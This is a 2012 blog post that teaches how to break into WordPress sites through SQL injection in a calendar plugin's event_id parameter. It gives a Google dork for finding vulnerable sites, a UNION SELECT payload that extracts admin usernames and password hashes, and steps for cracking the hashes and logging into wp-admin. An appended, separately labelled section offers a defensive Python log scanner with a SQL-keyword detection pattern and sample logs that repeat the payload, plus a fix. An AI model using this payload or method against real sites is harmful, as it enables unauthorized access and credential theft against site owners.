
Friday 2 November 2012

Hack WordPress Blog: WordPress Calendar SQL Injection Vulnerability

The WP Calendar plugin for WordPress is vulnerable to SQL injection. Follow my instructions.

1. Go to www.google.com
2. Dork: "powered by WordPress" inurl:"/?event_id="
Search for it on Google and open any result you are comfortable with in a new tab.
3. Now, after 'id=', use the code given below.
null+and+1=2+union+select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2
8+from+wp_users
4. You get the username and password. Passwords are in hash form. Decrypt the hash.
5. You can log in at www.site.com/wp-admin

I hope you enjoy the tutorial. :-)
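
Seen from the site owner's side, the request in step 3 leaves a clear trace in the web server access log, because a legitimate event_id is only ever a number. The following is an added example, not part of the original post or of the plugin's code: a small log scanner that flags event_id values that are not plain integers. The combined log format, the token list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache/Nginx combined log prefix: ip - - [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Tokens taken from the string quoted in step 3 (assumed triage list, not exhaustive)
SQL_HINT = re.compile(r"\b(union|select|concat|from)\b|wp_users|0x[0-9a-f]+", re.I)

# Constructed sample log lines (documentation IP ranges, shortened payload)
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Nov/2012:10:00:01 +0000] "GET /?event_id=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [02/Nov/2012:10:00:05 +0000] "GET /?event_id=null+and+1=2+union'
    '+select+1,concat(user_login,0x3a,user_pass),3+from+wp_users HTTP/1.1" 200 7311',
    '198.51.100.7 - - [02/Nov/2012:10:00:09 +0000] "GET /?event_id=%6eull%20UNION%20SELECT%201 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [02/Nov/2012:10:01:00 +0000] "GET /?event_id=abc HTTP/1.1" 200 5120',
    '192.0.2.10 - - [02/Nov/2012:10:02:00 +0000] "GET /?p=3 HTTP/1.1" 200 900',
]


def classify_event_id(value):
    """Return None for a plain numeric id, otherwise a short reason label."""
    if re.fullmatch(r"[0-9]{1,10}", value):
        return None
    return "sql-keywords" if SQL_HINT.search(value) else "non-numeric"


def scan(lines, param="event_id"):
    """Return (ip, time, status, reason, decoded_value) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        ip, when, _method, target, status = m.groups()
        # parse_qsl percent-decodes and maps '+' to space, so encoded variants normalise
        for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            reason = classify_event_id(value) if key == param else None
            if reason:
                findings.append((ip, when, int(status), reason, value))
    return findings


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same numeric-only rule is the fix on the server side: casting event_id to an integer, or binding it as a query parameter, before it reaches the database rejects every flagged value above.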
